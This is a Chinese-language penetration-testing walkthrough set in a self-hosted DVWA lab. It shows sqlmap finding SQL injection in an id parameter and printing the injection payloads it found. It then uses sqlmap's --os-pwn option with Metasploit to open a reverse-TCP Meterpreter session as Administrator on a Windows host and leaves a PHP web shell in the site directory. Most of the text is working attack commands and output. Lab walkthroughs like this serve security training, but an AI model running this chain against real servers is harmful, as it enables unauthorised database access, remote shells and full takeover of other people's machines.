SQLMAP結合Meterpreter實現注入滲透返回shell

自己搭建一個PHP+MYSQL平台，靶場為DVWA，設定SQL注入靶場層級為low（方便測試使用）。
在提交框中輸入1，用burp抓包，將包資料複製到cookies.txt文檔中，拖到kali環境。
root@kali:~# sqlmap -r "/root/cookies.txt"
返回：
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-1890' OR 7466=7466#&Submit=Submit
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=-6878' OR 1 GROUP BY CONCAT(0x7162626271,(SELECT (CASE WHEN (5403=5403) THEN 1 ELSE 0 END)),0x716b766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: id=' AND (SELECT * FROM (SELECT(SLEEP(5)))Dgpu)#&Submit=Submit
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x4c4266596d5953594265,0x716b766271)#&Submit=Submit
---
[13:45:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[13:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.8'
 
確定注入點後：
root@kali:~# sqlmap -r "/root/cookies.txt" --os-pwn --msf-path=/opt/metasploit
部分省略
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1（使用metasploit的TCP串連shell）
 
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4（PHP的指令碼）
 
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2（自訂路徑）
please provide a comma separate list of absolute directory paths: D:/WWW/DVWA/（輸入絕對路徑）
 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1（TCP反向串連shell）
what is the local address? [Enter for '192.168.1.104' (detected)]
which local port number do you want to use? [16308]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1（meterpreter shell）
 
部分省略
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 16308
LHOST => 192.168.1.104
[*] Started reverse handler on 192.168.1.104:16308
[*] Starting the payload handler...
[13:46:43] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (957487 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.104:16308 -> 192.168.1.8:37639) at 2016-01-17 13:46:45 +0800
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > Computer        : PGOS
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter > Server username: PGOS\Administrator
meterpreter >
同時，DVWA目錄下會產生一個隨機的php上傳shell。